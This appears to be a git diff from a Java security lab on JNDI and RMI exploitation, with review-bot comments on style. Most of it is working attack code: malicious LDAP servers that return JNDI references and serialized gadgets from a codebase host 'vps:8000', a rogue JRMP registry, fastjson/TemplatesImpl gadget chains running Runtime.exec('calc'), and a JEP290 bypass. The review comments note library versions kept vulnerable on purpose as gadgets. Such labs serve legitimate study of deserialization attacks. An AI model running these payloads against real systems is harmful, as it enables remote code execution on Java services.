设置JNDI初始化工厂类名 - env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.dns.DnsContextFactory"); - - // 设置JNDI提供服务的URL地址,这里可以设置解析的DNS服务器地址 - env.put(Context.PROVIDER_URL, "dns://114.114.114.114/"); - - try { - // 创建JNDI目录服务对象 - DirContext context = new InitialDirContext(env); - - // 获取DNS解析记录测试 - Attributes attrs1 = context.getAttributes("baidu.com", new String[]{"A"}); - Attributes attrs2 = context.getAttributes("qq.com", new String[]{"A"}); - - System.out.println(attrs1); - System.out.println(attrs2); - } catch (NamingException e) { - e.printStackTrace(); - } - } -} 
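Review bot: The new dependency block pins libraries at versions that only make sense as exploitation targets — `fastjson 1.2.47` is the release with the widely documented autoType bypass, and the `tomcat-embed-core`, `h2`, `hsqldb`, `druid` group looks like the local-ObjectFactory / JDBC gadget set used for JNDI on newer JDKs — yet nothing in the pom records that intent. Add one XML comment per pin, e.g. `<!-- 1.2.47: autoType bypass gadget - intentionally old -->` on fastjson and `<!-- local factory / JDBC gadget targets for high-JDK JNDI bypass -->` above the tomcat/h2/hsqldb/druid group, so a scanner-driven upgrade does not quietly remove the lab's gadgets. `unboundid-ldapsdk 3.2.0` was already present and is what the LDAP servers in this commit use; it needs no note.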
diff --git a/JNDI/JNDI_vul/client/src/main/java/InitialC.java b/JNDI/JNDI/src/main/java/JndiClient.java similarity index 53% rename from JNDI/JNDI_vul/client/src/main/java/InitialC.java rename to JNDI/JNDI/src/main/java/JndiClient.java index 4203ca3..6b264e7 100644 --- a/JNDI/JNDI_vul/client/src/main/java/InitialC.java +++ b/JNDI/JNDI/src/main/java/JndiClient.java @@ -1,9 +1,11 @@ import javax.naming.InitialContext; import javax.naming.NamingException; -public class InitialC { +public class JndiClient { public static void main(String[] args) throws NamingException { + String rmiHost = "rmi://127.0.0.1:1099/Calc123"; + String ldapHost = "ldap://127.0.0.1:1389/anything"; InitialContext initialContext = new InitialContext(); - initialContext.lookup("ldap://127.0.0.1:1389/Calc"); + initialContext.lookup(ldapHost); } } diff --git a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java similarity index 81% rename from JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java rename to JNDI/JNDI/src/main/java/LDAP/codebaseServer.java index 12d93df..726fd3d 100644 --- a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java +++ b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java @@ -1,11 +1,5 @@ -package normal_ldap; +package LDAP; -import java.net.InetAddress; -import java.net.MalformedURLException; -import java.net.URL; -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; import com.unboundid.ldap.listener.InMemoryDirectoryServer; import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; import com.unboundid.ldap.listener.InMemoryListenerConfig; 
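Review bot: `rmiHost` is assigned and never used in `JndiClient.main`, leaving the reader to guess whether the RMI path is meant to be exercised from here or only from `RMI.Client` in this commit. Either delete it or document both targets, e.g. `// LDAP: answered by LDAP.codebaseServer / LDAP.deserServer - the interceptor echoes whatever base DN is requested, so the "/anything" suffix is arbitrary` above `ldapHost`, and an equivalent `// RMI: ...` naming the registry that serves `Calc123` on 1099 (none in this commit listens there, as far as I can see). Without that, `Calc123` and `anything` read as typos rather than as deliberate "the name does not matter" markers.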
@@ -15,25 +9,23 @@ import com.unboundid.ldap.sdk.LDAPException; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; -/** - * LDAP server implementation returning JNDI references - * - * @author mbechler - * - */ -public class JNDILdapServer { - +public class codebaseServer { private static final String LDAP_BASE = "dc=example,dc=com"; - public static void main (String[] args) { - int port = 1389; String url = "http://127.0.0.1:7777/#Calc"; + int port = 1389; try { InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( - "listen", //$NON-NLS-1$ - InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ + "listen", + InetAddress.getByName("0.0.0.0"), port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), 
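Review bot: The listener is bound to `InetAddress.getByName("0.0.0.0")`, so this reference-returning LDAP server is reachable from every interface of the host running the lab, while the codebase it advertises is `http://127.0.0.1:7777/#Calc` — a loopback URL only the same machine can fetch — so one of the two settings is wrong as written. Unless a remote victim is intended, bind to `InetAddress.getLoopbackAddress()` and adjust the `Listening on` message; if remote is intended, the codebase host must be an address the victim can reach. `main` starts in this hunk and its tail (interceptor registration, `startListening`) is in the next one.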
@@ -41,32 +33,23 @@ public static void main (String[] args) { config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ + System.out.println("Listening on 0.0.0.0:" + port); ds.startListening(); - } catch ( Exception e ) { e.printStackTrace(); } } - private static class OperationInterceptor extends InMemoryOperationInterceptor { - private URL codebase; - /** - * - */ - public OperationInterceptor ( URL cb ) { + * */ public OperationInterceptor ( URL cb ) { this.codebase = cb; } - /** * {@inheritDoc} - * - * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) - */ - @Override + * * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override public void processSearchResult ( InMemoryInterceptedSearchResult result ) { String base = result.getRequest().getBaseDN(); Entry e = new Entry(base); 
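Review bot: The Javadoc in `OperationInterceptor` came out mangled in this hunk: the constructor now reads `/** * */ public OperationInterceptor ( URL cb ) {` and `processSearchResult` has `*/ @Override` on one line with the `@see` tag glued to a `* *` line, which reads as a failed reformat rather than intent. Either restore a real one-liner — `/** Answers every search with a JNDI Reference pointing at {@code codebase}. */` on its own line above the constructor — or delete the empty Javadoc, and move `@Override` back onto its own line above `public void processSearchResult`. This hunk covers only the end of `main` and the start of the interceptor; `sendResult` is in the following hunk.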
@@ -76,23 +59,22 @@ public void processSearchResult ( InMemoryInterceptedSearchResult result ) { catch ( Exception e1 ) { e1.printStackTrace(); } - } - protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); - e.addAttribute("javaClassName", "Calc"); + e.addAttribute("javaClassName", "Exploit"); String cbstring = this.codebase.toString(); int refPos = cbstring.indexOf('#'); if ( refPos > 0 ) { cbstring = cbstring.substring(0, refPos); } e.addAttribute("javaCodeBase", cbstring); - e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ + e.addAttribute("objectClass", "javaNamingReference"); e.addAttribute("javaFactory", this.codebase.getRef()); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } + } } \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/LDAP/deserServer.java b/JNDI/JNDI/src/main/java/LDAP/deserServer.java new file mode 100644 index 0000000..2ce96bd --- /dev/null +++ b/JNDI/JNDI/src/main/java/LDAP/deserServer.java 
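Review bot: `javaClassName` is changed to `"Exploit"` while the factory attribute stays `this.codebase.getRef()`, i.e. `Calc` from the `#Calc` URL in `main`, so the returned entry now names one class and tells the client to load another. As far as I can tell `javaClassName` only populates the Reference's className and the client actually loads `javaFactory` from `javaCodeBase`, so this is functionally harmless, but it is misleading next to the `Send LDAP reference result ...` log line; use `this.codebase.getRef()` for both attributes or add `// className is informational; javaFactory is what the client loads`. Separately, `this.codebase.getRef().replace(...)` NPEs if the URL has no `#fragment` — `main` in this file always supplies one, but a one-line `Objects.requireNonNull(cb.getRef(), "codebase URL needs a #FactoryClass fragment")` in the constructor would turn that into a clear error.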
@@ -0,0 +1,111 @@ +package LDAP; + +import com.unboundid.util.Base64; +import com.unboundid.ldap.listener.InMemoryDirectoryServer; +import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; +import com.unboundid.ldap.listener.InMemoryListenerConfig; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPException; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; +import tools.PayloadGen; +import tools.ReflectTools; + +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; +import java.text.ParseException; + +public class deserServer { + + private static final String LDAP_BASE = "dc=example,dc=com"; + + + public static void main (String[] args) { + + String url = "http://vps:8000/#ExportObject"; + int port = 1389; + + + try { + InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); + config.setListenerConfigs(new InMemoryListenerConfig( + "listen", + InetAddress.getByName("0.0.0.0"), + port, + ServerSocketFactory.getDefault(), + SocketFactory.getDefault(), + (SSLSocketFactory) SSLSocketFactory.getDefault())); + + config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); + InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); + System.out.println("Listening on 0.0.0.0:" + port); + ds.startListening(); + + } + catch ( Exception e ) { + e.printStackTrace(); + } + } + + private static class OperationInterceptor extends InMemoryOperationInterceptor { + + private URL codebase; + + + /** + * */ public OperationInterceptor ( URL cb ) { + this.codebase = cb; + } + + + /** + * {@inheritDoc} + * * @see 
com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override + public void processSearchResult ( InMemoryInterceptedSearchResult result ) { + String base = result.getRequest().getBaseDN(); + Entry e = new Entry(base); + try { + sendResult(result, base, e); + } + catch ( Exception e1 ) { + e1.printStackTrace(); + } + + } + + + protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception { + URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); + System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); + e.addAttribute("javaClassName", "Exploit"); + String cbstring = this.codebase.toString(); + int refPos = cbstring.indexOf('#'); + if ( refPos > 0 ) { + cbstring = cbstring.substring(0, refPos); + } + + // Payload1: 利用LDAP+Reference Factory +// e.addAttribute("javaCodeBase", cbstring); +// e.addAttribute("objectClass", "javaNamingReference"); +// e.addAttribute("javaFactory", this.codebase.getRef()); + + // Payload2: 返回序列化Gadget + try { + e.addAttribute("javaSerializedData", ReflectTools.ser2bytes(PayloadGen.getPayload())); + } catch (ParseException exception) { + exception.printStackTrace(); + } + + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } + + } +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/Client.java b/JNDI/JNDI/src/main/java/RMI/Client.java new file mode 100644 index 0000000..3ca3c85 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Client.java 
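Review bot: `sendResult` in `deserServer` keeps the old Reference payload as three commented-out `e.addAttribute` lines next to an always-on `javaSerializedData` branch, and `codebase` (`http://vps:8000/#ExportObject`) is now only used to build the `turl` log message, so the file reads like a half-converted copy of `codebaseServer`. Delete the dead lines and say what this server is for in a header comment, e.g. `// Returns a pre-serialized gadget via javaSerializedData (deserialized by the client's JNDI decoder); codebaseServer covers the javaCodeBase/Reference variant`. The `catch (ParseException)` around `PayloadGen.getPayload()` only prints and then still sends an entry with no payload attribute — drop the try/catch (`sendResult` already `throws Exception`) so a broken payload fails loudly instead of producing a silent no-op search result. `com.unboundid.util.Base64` and `java.net.MalformedURLException` are imported and unused.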
@@ -0,0 +1,23 @@
+package RMI;
+
+import java.rmi.NotBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+public class Client {
+ public static void main(String[] args) throws Exception {
+ serverAttackClientWithJRMP();
+ }
+
+ // 从registry获取的stub指向恶意skel,通过DGC JRMP,实现server打client
+ public static void serverAttackClientWithJRMP() throws Exception{
+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999);
+ registry.lookup("951d14");
+ }
+
+ public static void rmiDeser() throws Exception{
+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 50388);
+ registry.lookup("c4e578");
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java
new file mode 100644
index 0000000..704bd81
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java
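Review bot: `NotBoundException` and `RemoteException` are imported but never referenced, because both methods declare `throws Exception`; either drop the two imports or narrow the clauses to `throws RemoteException, NotBoundException`, which documents what `Registry.lookup` can actually fail with. `rmiDeser` is never called from `main` and, unlike its sibling, has no comment saying what scenario it belongs to; a one-line comment or a note that `main` is meant to be edited to select a case would help.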
@@ -0,0 +1,350 @@
+package RMI;
+
+import java.io.BufferedInputStream;
+import java.io.BufferedOutputStream;
+import java.io.DataInputStream;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamClass;
+import java.io.OutputStream;
+import java.net.InetSocketAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.SocketException;
+import java.net.URL;
+import java.net.URLClassLoader;
+import java.rmi.MarshalException;
+import java.rmi.server.ObjID;
+import java.rmi.server.UID;
+import javax.net.ServerSocketFactory;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import tools.PayloadGen;
+
+// 在client lookup后,直接返回恶意stub,进行反序列化
+public class EvilRegistry implements Runnable {
+ public static void main(String[] args) {
+ //before you start it, you should set vm options:"--add-opens=java.base/sun.nio.ch=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=jdk.unsupported/sun.misc=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED"
+ EvilRegistry.start();
+ }
+ private static final Logger log = LoggerFactory.getLogger(EvilRegistry.class);
+ public String ip;
+ public int port;
+ private ServerSocket ss;
+ private final Object waitLock = new Object();
+ private boolean exit;
+ private boolean hadConnection;
+ private static EvilRegistry serverInstance;
+
+ public EvilRegistry(String ip, int port) {
+ try {
+ this.ip = ip;
+ this.port = port;
+ this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ }
+
+ public static synchronized void start() {
+ serverInstance = new EvilRegistry("0.0.0.0", 8899);
+ Thread serverThread = new Thread(serverInstance);
+ serverThread.start();
+ log.warn("[RMI RMI.Server] is already running.");
+ }
+
+ public static synchronized void stop() {
+ if (serverInstance != null) {
+ serverInstance.exit = true;
+
+ try {
+ serverInstance.ss.close();
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+
+ serverInstance = null;
+ System.out.println("[RMI RMI.Server] stopped.");
+ }
+
+ }
+
+ public boolean waitFor(int i) {
+ try {
+ if (this.hadConnection) {
+ return true;
+ } else {
+ System.out.println("[RMI RMI.Server] Waiting for connection");
+ synchronized(this.waitLock) {
+ this.waitLock.wait((long)i);
+ }
+
+ return this.hadConnection;
+ }
+ } catch (InterruptedException var5) {
+ return false;
+ }
+ }
+
+ public void close() {
+ this.exit = true;
+
+ try {
+ this.ss.close();
+ } catch (IOException var4) {
+ }
+
+ synchronized(this.waitLock) {
+ this.waitLock.notify();
+ }
+ }
+
+ public void run() {
+ System.out.println("[RMI RMI.Server] Listening on {}:{}" + "127.0.0.1" + "8899");
+
+ try {
+ Socket s = null;
+
+ try {
+ while(!this.exit && (s = this.ss.accept()) != null) {
+ try {
+ s.setSoTimeout(5000);
+ InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress();
+ System.out.println("[RMI RMI.Server] Have connection from " + remote);
+ InputStream is = s.getInputStream();
+ InputStream bufIn = (InputStream)(is.markSupported() ? is : new BufferedInputStream(is));
+ bufIn.mark(4);
+ DataInputStream in = new DataInputStream(bufIn);
+ Throwable var6 = null;
+
+ try {
+ int magic = in.readInt();
+ short version = in.readShort();
+ if (magic == 1246907721 && version == 2) {
+ OutputStream sockOut = s.getOutputStream();
+ BufferedOutputStream bufOut = new BufferedOutputStream(sockOut);
+ DataOutputStream out = new DataOutputStream(bufOut);
+ Throwable var12 = null;
+
+ try {
+ byte protocol = in.readByte();
+ switch (protocol) {
+ case 75:
+ out.writeByte(78);
+ if (remote.getHostName() != null) {
+ out.writeUTF(remote.getHostName());
+ } else {
+ out.writeUTF(remote.getAddress().toString());
+ }
+
+ out.writeInt(remote.getPort());
+ out.flush();
+ in.readUTF();
+ in.readInt();
+ case 76:
+ this.doMessage(s, in, out);
+ bufOut.flush();
+ out.flush();
+ break;
+ case 77:
+ default:
+ System.out.println("[RMI RMI.Server] Unsupported protocol");
+ s.close();
+ }
+ } catch (Throwable var88) {
+ var12 = var88;
+ throw var88;
+ } finally {
+ if (out != null) {
+ if (var12 != null) {
+ try {
+ out.close();
+ } catch (Throwable var87) {
+ var12.addSuppressed(var87);
+ }
+ } else {
+ out.close();
+ }
+ }
+
+ }
+ } else {
+ s.close();
+ }
+ } catch (Throwable var90) {
+ var6 = var90;
+ throw var90;
+ } finally {
+ if (in != null) {
+ if (var6 != null) {
+ try {
+ in.close();
+ } catch (Throwable var86) {
+ var6.addSuppressed(var86);
+ }
+ } else {
+ in.close();
+ }
+ }
+
+ }
+ } catch (InterruptedException var92) {
+ return;
+ } catch (Exception e) {
+ e.printStackTrace(System.err);
+ } finally {
+ System.out.println("[RMI RMI.Server] Closing connection");
+ s.close();
+ }
+ }
+
+ return;
+ } finally {
+ if (s != null) {
+ s.close();
+ }
+
+ if (this.ss != null) {
+ this.ss.close();
+ }
+
+ }
+ } catch (SocketException var96) {
+ } catch (Exception e) {
+ e.printStackTrace(System.err);
+ }
+
+ }
+
+ private void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
+ System.out.println("[RMI RMI.Server] Reading message...");
+ int op = in.read();
+ switch (op) {
+ case 80:
+ this.doCall(s, in, out);
+ break;
+ case 81:
+ case 83:
+ default:
+ throw new IOException("unknown transport op " + op);
+ case 82:
+ out.writeByte(83);
+ break;
+ case 84:
+ UID.read(in);
+ }
+
+ s.close();
+ }
+
+ private void doCall(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
+ ObjectInputStream ois = new ObjectInputStream(in) {
+ protected Class resolveClass(ObjectStreamClass desc) throws IOException {
+ if ("[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
+ return ObjID[].class;
+ } else if ("java.rmi.server.ObjID".equals(desc.getName())) {
+ return ObjID.class;
+ } else if ("java.rmi.server.UID".equals(desc.getName())) {
+ return UID.class;
+ } else if ("java.lang.String".equals(desc.getName())) {
+ return String.class;
+ } else {
+ throw new IOException("Not allowed to read object");
+ }
+ }
+ };
+
+ ObjID read;
+ try {
+ read = ObjID.read(ois);
+ } catch (IOException e) {
+ throw new MarshalException("unable to read objID", e);
+ }
+
+ if (read.hashCode() == 2) {
+ handleDGC(ois);
+ } else if (read.hashCode() == 0) {
+ if (this.handleRMI(s, ois, out)) {
+ this.hadConnection = true;
+ synchronized(this.waitLock) {
+ this.waitLock.notifyAll();
+ return;
+ }
+ }
+
+ s.close();
+ }
+
+ }
+
+ private boolean handleRMI(Socket s, ObjectInputStream ois, DataOutputStream out) throws Exception {
+ int method = ois.readInt();
+ ois.readLong();
+ if (method != 2) {
+ return false;
+ } else {
+ String object = (String)ois.readObject();
+ out.writeByte(81);
+
+ Object obj;
+ try (ObjectOutputStream oos = new MarshalOutputStream(out, "evil")) {
+ oos.writeByte(1);
+ (new UID()).write(oos);
+ String path = "/" + object;
+ System.out.println("[RMI RMI.Server] Send payloadData for " + path);
+ System.out.println();
+ new Object();
+ obj = PayloadGen.getPayload();//替换为序列化数据
+ oos.writeObject(obj);
+ oos.flush();
+ out.flush();
+ return true;
+ }
+ }
+ }
+ private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException {
+ ois.readInt();
+ ois.readLong();
+ }
+ static final class MarshalOutputStream extends ObjectOutputStream {
+ private String sendUrl;
+
+ public MarshalOutputStream(OutputStream out, String u) throws IOException {
+ super(out);
+ this.sendUrl = u;
+ }
+
+ MarshalOutputStream(OutputStream out) throws IOException {
+ super(out);
+ }
+
+ protected void annotateClass(Class cl) throws IOException {
+ if (this.sendUrl != null) {
+ this.writeObject(this.sendUrl);
+ } else if (!(cl.getClassLoader() instanceof URLClassLoader)) {
+ this.writeObject((Object)null);
+ } else {
+ URL[] us = ((URLClassLoader)cl.getClassLoader()).getURLs();
+ String cb = "";
+
+ for(URL u : us) {
+ cb = cb + u.toString();
+ }
+
+ this.writeObject(cb);
+ }
+
+ }
+
+ protected void annotateProxyClass(Class cl) throws IOException {
+ this.annotateClass(cl);
+ }
+ }
+
+
+}
\ No newline at end of file
diff --git a/JNDI/JNDI/src/main/java/RMI/MyRegistry.java b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java
new file mode 100644
index 0000000..c70761c
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java
@@ -0,0 +1,14 @@
+package RMI;
+
+import remoteObj.HelloImpl;
+
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+
+public class MyRegistry {
+ public static void main(String[] args) throws RemoteException, AlreadyBoundException {
+ java.rmi.registry.Registry registry = LocateRegistry.createRegistry(1099);
+ registry.bind("hello", new HelloImpl());
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/RMI/Server.java b/JNDI/JNDI/src/main/java/RMI/Server.java
new file mode 100644
index 0000000..d39d2de
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/RMI/Server.java
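Review bot: The banner in `run()` is malformed — `"[RMI RMI.Server] Listening on {}:{}" + "127.0.0.1" + "8899"` concatenates SLF4J placeholders with string literals (it prints `Listening on {}:{}127.0.0.18899`) and ignores the `ip`/`port` fields; the class already has `log`, so `log.info("[RMI RMI.Server] Listening on {}:{}", this.ip, this.port)` is the fix, and `start()` likewise emits `is already running` unconditionally right after starting the thread. In the protocol `switch`, `case 75:` intentionally drops into `case 76:` after the handshake; add a `// fall through` comment so the missing `break` is not "fixed" later. `close()` swallows `IOException var4` and `run()` swallows `SocketException var96` with empty catch blocks; name the variable `ignored` and say why (the socket is expected to be closed on shutdown). The anonymous `ObjectInputStream` in `doCall` declares `resolveClass` with a raw `Class` return type; the JDK signature is `Class<?>`, and the same raw type appears on `annotateClass`/`annotateProxyClass` in `MarshalOutputStream`.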
@@ -0,0 +1,78 @@
+package RMI;
+
+import com.alibaba.fastjson.JSONArray;
+import remoteObj.HelloImpl;
+import sun.rmi.server.UnicastRef;
+import sun.rmi.transport.LiveRef;
+import sun.rmi.transport.tcp.TCPEndpoint;
+import tools.ClassByteGen;
+import tools.InvocationHandlerImpl;
+import tools.ReflectTools;
+import tools.TemplatesGen;
+
+import javax.management.BadAttributeValueExpException;
+import javax.xml.transform.Templates;
+import java.lang.reflect.Proxy;
+import java.rmi.Remote;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.rmi.server.ObjID;
+import java.rmi.server.RemoteObjectInvocationHandler;
+import java.util.Random;
+
+public class Server {
+
+ public static void main(String[] args) throws Exception {
+ serverAttackRegistryWithJRMP();
+ }
+
+ // 正常绑定远程对象
+ public static void bind() throws Exception {
+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+ registry.bind("HelloImpl", new HelloImpl());
+ }
+
+
+ // fastjson原生反序列化触发getter,bind实现server打registry,适用于<8u121
+ public static void serverAttackRegistryWithBind() throws Exception {
+ String code = "{\n" +
+ " Runtime.getRuntime().exec(\"calc\");\n" +
+ " }";
+ byte[] bytes = ClassByteGen.getBytes(code, "AAAA");
+ Templates templates = TemplatesGen.getTemplates(bytes, null);
+ JSONArray jsonArray = new JSONArray();
+ jsonArray.add(templates);
+
+ BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa");
+ ReflectTools.setFieldValue(bad, "val", jsonArray);
+
+ InvocationHandlerImpl invocationHandler = new InvocationHandlerImpl(bad);
+ Remote o = (Remote) Proxy.newProxyInstance(invocationHandler.getClass().getClassLoader(), new Class[]{Remote.class}, invocationHandler);
+
+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+ registry.bind("evil1", o);
+ }
+
+ // 将stub里的skel地址指向恶意JRMP服务,实现server打registry
+ public static void serverAttackRegistryWithJRMP() throws Exception {
+ ObjID id = new ObjID(new Random().nextInt()); // RMI registry
+ TCPEndpoint te = new TCPEndpoint("127.0.0.1", 13999);
+ UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
+ RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
+ Registry proxy = (Registry) Proxy.newProxyInstance(Server.class.getClassLoader(), new Class[] {
+ Registry.class
+ }, obj);
+
+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+ registry.bind("evil24", proxy);
+ }
+
+ // 通过DGC JRMP实现registry打server
+ public static void registerAttackServer() throws Exception {
+ // java-chains启动恶意JRMP服务
+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999);
+ HelloImpl hello = new HelloImpl();
+ registry.bind("evil3", hello);
+ }
+
+}
diff --git a/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java
new file mode 100644
index 0000000..e78572b
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java
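Review bot: `serverAttackRegistryWithBind` repeats `PayloadGen.getPayload()` line for line (the `code` string, `ClassByteGen.getBytes`, `TemplatesGen.getTemplates`, the `JSONArray` and the `BadAttributeValueExpException` field write); call the helper instead so the two copies cannot drift apart — `tools/PayloadGen.java` in this same commit is the copy to keep. The class has no Javadoc and its only documentation is Chinese line comments; add an English class comment and a comment per method, e.g. `// Normal bind of a remote object` above `bind()`. `bind()` and `registerAttackServer` are never called from `main`, which runs only `serverAttackRegistryWithJRMP`, so say in the class comment that each method is an independent scenario selected by editing `main`.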
@@ -0,0 +1,73 @@
+package RMI;
+
+import sun.rmi.registry.RegistryImpl_Stub;
+import sun.rmi.server.UnicastRef;
+import sun.rmi.transport.LiveRef;
+import sun.rmi.transport.tcp.TCPEndpoint;
+
+import java.io.ObjectOutput;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.Proxy;
+import java.rmi.Remote;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.rmi.server.*;
+import java.util.Random;
+
+// 绕过JEP290(8u231~8u240)
+public class ServerBypassJEP290 {
+ public static void main(String[] args) throws Exception {
+ UnicastRemoteObject payload = getPayload();
+ java.rmi.registry.Registry registry = LocateRegistry.getRegistry(1099);
+ bindReflection("pwn", payload, registry);
+ }
+
+ static UnicastRemoteObject getPayload() throws Exception {
+ ObjID id = new ObjID(new Random().nextInt());
+ TCPEndpoint te = new TCPEndpoint("localhost", 13999);
+ UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
+
+ System.getProperties().put("sun.misc.ProxyGenerator.saveGeneratedFiles", "true");
+ RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(ref);
+ RMIServerSocketFactory factory = (RMIServerSocketFactory) Proxy.newProxyInstance(
+ handler.getClass().getClassLoader(),
+ new Class[]{RMIServerSocketFactory.class, Remote.class},
+ handler
+ );
+
+ Constructor constructor = UnicastRemoteObject.class.getDeclaredConstructor();
+ constructor.setAccessible(true);
+ UnicastRemoteObject unicastRemoteObject = constructor.newInstance();
+
+ Field field_ssf = UnicastRemoteObject.class.getDeclaredField("ssf");
+ field_ssf.setAccessible(true);
+ field_ssf.set(unicastRemoteObject, factory);
+
+ return unicastRemoteObject;
+ }
+
+ static void bindReflection(String name, Object obj, Registry registry) throws Exception {
+ Field ref_filed = RemoteObject.class.getDeclaredField("ref");
+ ref_filed.setAccessible(true);
+ UnicastRef ref = (UnicastRef) ref_filed.get(registry);
+
+ Field operations_filed = RegistryImpl_Stub.class.getDeclaredField("operations");
+ operations_filed.setAccessible(true);
+ Operation[] operations = (Operation[]) operations_filed.get(registry);
+
+ RemoteCall remoteCall = ref.newCall((RemoteObject) registry, operations, 0, 4905912898345647071L);
+ ObjectOutput outputStream = remoteCall.getOutputStream();
+
+ Field enableReplace_filed = ObjectOutputStream.class.getDeclaredField("enableReplace");
+ enableReplace_filed.setAccessible(true);
+ enableReplace_filed.setBoolean(outputStream, false);
+
+ outputStream.writeObject(name);
+ outputStream.writeObject(obj);
+
+ ref.invoke(remoteCall);
+ ref.done(remoteCall);
+ }
+}
diff --git a/JNDI/JNDI/src/main/java/RMIServer.java b/JNDI/JNDI/src/main/java/RMIServer.java
new file mode 100644
index 0000000..d65eb3f
--- /dev/null
+++ b/JNDI/JNDI/src/main/java/RMIServer.java
